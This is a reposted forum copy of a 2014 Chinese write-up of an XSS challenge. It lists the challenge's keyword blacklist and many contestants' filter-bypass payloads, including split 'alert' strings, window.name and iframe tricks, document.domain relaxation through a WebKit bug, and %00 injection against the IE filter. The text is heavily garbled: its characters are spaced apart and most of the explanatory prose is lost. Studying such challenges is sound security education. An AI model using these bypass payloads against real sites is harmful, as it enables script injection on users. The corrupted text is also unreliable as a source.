[7769] 2014-01-26_XSS挑战第一期Writeup

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-17
2014-01-26_XSS挑战第一期Writeup X S S W r i t e u p 0 x 4 d   F r e e B u f   2 0 1 4 - 0 1 - 2 6 0 × 0 0         X S S M o d e r n   W e b   A p p l i c a t i o n   F i r e w a l l s   F i n g e r p r i n t i n g   a n d   B y p a s s i n g   X S S   F i l t e r s j a v a s c r i p t < a   o n m o u s e o v e r = " j a v a s c r i p t : w i n d o w . o n e r r o r = a l e r t ; t h r o w   1 >     a l e r t ( ) , J a v a s c r i p t X S S 0 × 0 1     X S S       (   ,   )   ,   &   ,     ,   <   ,   >   ,   '   ,   % 2 8 ,     % 2 9   ,   + o n   ,   a l e r t   ,   d a t a     ,   s r c   ,   e v a l   ,   u n e s c a p e           i n n e r H T M L   ,   d o c u m e n t   ,   a p p e n d C h i l d   ,   c r e a t e E l e m e n t   ,   w r i t e   ,   S t r i n g   ,   s e t T i m e o u t   x s s   h t t p : / / 1 3 3 . 5 2 . 2 4 0 . 7 5 0 × 0 2 g a i n o v e r F i r s t   B l o o d " o n b l u r = a = " % 2 " , l o c a t i o n = " j a v a s c r i p t : a l e r " + " t " + a + " 8 1 " + a + " 9     使 U R L : % 2 8 % 2 9 p a y l o a d " o n b l u r = l o c a t i o n = " j a v a s c r i p t : a l e r " + " t % 2 " + " 8 1 % 2 " + " 9     p x 1 6 2 4 使 g a i n o n v e r h r e f " o n b l u r = l o c a t i o n . h r e f = " J A v a s c r i p t : a l e " + " r t % 2 " + " 8 1 % 2 " + " 9     g a i n v e r
" o n b l u r = t o p . o n e r r o r = t o p [ " a l e " + " r t " ] ; t h r o w " 1     使 w i n d o w 使 t o p , 使 p a r e n t s e l f t o p o n b l u r o n c u t , o n e r r o r o n b l u r C h r o m e i n p u t c t r l + x t a b     t o p , g a i n o v e r " o n b l u r = o u t e r H T M L = U R L / / # < i m g / s r c = 1   o n e r r o r = a l e r t ( 1 ) >     # Q u e r y S t r i n g 2 3 使 o u t e r H T M L U R L D O M I n t e r n e t   E x p l o r e r I E 8 C h r o m e U R L D O M F i r e f o x U R L D O M H T M L U R L J S U R L D O M p a y l o a d g a i n o v e r / / " o n b l u r = o u t e r H T M L = U R L   # < i m g / s r c = 1   o n e r r o r = a l e r t ( 1 ) >     f a n g f e i   y a n g " o n c u t = t o p . o n e r r o r % 3 D t o p [ " a l " + " e r t " ] ; t h r o w " 1     C h u   < i f r a m e   s r c = " h t t p : / / x s s . z 7 y s . c o m / ? x s s = " o n b l u r = " l o c a t i o n = w i n d o w . n a m e & s u b m i t = "   n a m e = " j a v a s c r i p t : a l e r t ( 1 ) " > < / i f r a m e >     w i n d o w . n a m e i f r a m e U R L . h a s h   w i n d o w . p o s t M e s s a g e i f r a m e D u n " o n f o c u s = n e w % A 1 % A 1 w i n d o w [ " a l " + " e r t " ]     使 u t f - 8 使 G B 2 3 1 2 G B 2 3 1 2 % A 1 % A 1 % 0 B % 0 B D u n 使 W e b k i t B U G p a y l o a d w e b k i t B U G P O C : < s c r i p t >   v a r   d d = f a l s e ;   d o c u m e n t . d o m a i n = " " ;   < / s c r i p t >   < i f r a m e   i d = " x s s " s r c = " / / x s s . z 7 y s . c o m . / ? x s s = % 2 2 o n b l u r % 3 D d o m a i n % 3 D % 2 2 % 2 2 + & s u b m i t = % C B % D 1 % C B % F 7 " o n l o a d = " d d = t r u e ; " w i d t h = " 1 0 0 % " h e i g h t = " 1 0 0 % " o n m o u s e o v e r = " x s s a l e r t ( ) ; " > < / i f r a m e >   < s c r i p t >   f u n c t i o n   x s s a l e r t ( ) {   i f ( d d ) {   v a r   x s s i f r a m e = d o c u m e n t . g e t E l e m e n t B y I d ( " x s s " ) . c o n t e n t W i n d o w ;   x s s i f r a m e . d o c u m e n t . w r i t e ( " < s c r i p t > a l e r t ( 1 ) < / s c r i p t > " ) ;   } } ;   < / s c r i p t >
      S q l C o d e " o n c u t = _ = w i n d o w ; _ . o n e r r o r = _ [ " a l " + " e r t " ] ; t h r o w [ 1 ]     L a i x " o n c u t = l o c a t i o n = " j a v a s c r i p t : a l e r " + " t % " + " 2 8 1 % " + " 2 9     G a l a x y " o n b l u r = j a v a s c r i p t : w i n d o w . o n b l u r = a l % 0 0 e r t ; t h r o w " 1     使 I E 8 / I E 9   f i l t e r ( % 0 0 ) ,     e 3 r p 4 y " o n f o c u s = w i n d o w . o n b l u r = t o p [ " a l e r " % 2 b " t " ] ; t h r o w " 1       0 × 0 0 : ( ) & x s s = " o n c l i c k = a = l o c a t i o n . s e a r c h ; l o c a t i o n . h r e f = " j a v a s c r i p t : a " + " l e r t " + a [ 1 ] + a [ 2 ] / /     ( ) l o c a t i o n . s e a r c h " o n c l i c k = a = l o c a t i o n ; b = a . h a s h ; a . h r e f = " j a v a s c r i p t : a " + " l e r t " + b [ 1 ] + b [ 2 ] / / " o n c l i c k = a = l o c a t i o n ; a . h r e f = " j a v a s c r i p t : / * " + a . h a s h / / # * / a l e r t ( ) " o n c l i c k = " l o c a t i o n . h r e f = w i n d o w . n a m e     l i t d g : " / o n b l u r = w i n d o w . o n e r r o r = w i n d o w [ " a l e r " + " t " ] ; t h r o w + 1 / /     : " o n c l i c k = " l o c a t i o n = t o p . a . n a m e     / f d : < i f r a m e   n a m e = " j a v a s c r i p t : a l e r t ( 1 ) "   s r c = / / 1 3 3 . 5 2 . 2 4 0 . 7 5 / i n d e x . p h p ? x s s = " a u t o f o c u s / o n f o c u s = " l o c a t i o n = s e l f . n a m e > < / i f r a m e >     i f r a m e s e l f . n a m e < i f r a m e   h e i g h t = 5 0 0   s r c = / / x s s . z 7 y s . c o m / i n d e x . p h p ? x s s = % 2 2 o n d r o p % 3 D d o m a i n % 3 D % 2 2 c o m > < / i f r a m e > < s c r i p t >     d o c u m
e n t . d o m a i n   =   ' c o m ' ;       s e t I n t e r v a l ( f u n c t i o n ( )   {         f r a m e s [ 0 ] . a l e r t   & &   f r a m e s [ 0 ] . a l e r t ( 1 ) ;     } , 1 0 0 ) < / s c r i p t >   w e b k i t B U G + P O C < i f r a m e   h e i g h t = 5 0 0   s r c = / / x s s . z 7 y s . c o m . / i n d e x . p h p ? x s s = % 2 2 o n c u t % 3 D d o m a i n % 3 D % 2 2 > < / i f r a m e > < s c r i p t >     d o c u m e n t . d o m a i n   =   ' ' ;       s e t I n t e r v a l ( f u n c t i o n ( )   {         f r a m e s [ 0 ] . a l e r t   & &   f r a m e s [ 0 ] . a l e r t ( 1 ) ;     } , 1 0 0 ) < / s c r i p t > w e b k i t B U G   C h r o m i u m   3 1 . 0 . 1 6 5 0 . 8 1 5 0 × 0 3       T h e   s h o r t   t a l k   o f   X S S ( L a i x L i n e ) X S S X S S   / f d , L i n E ,
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则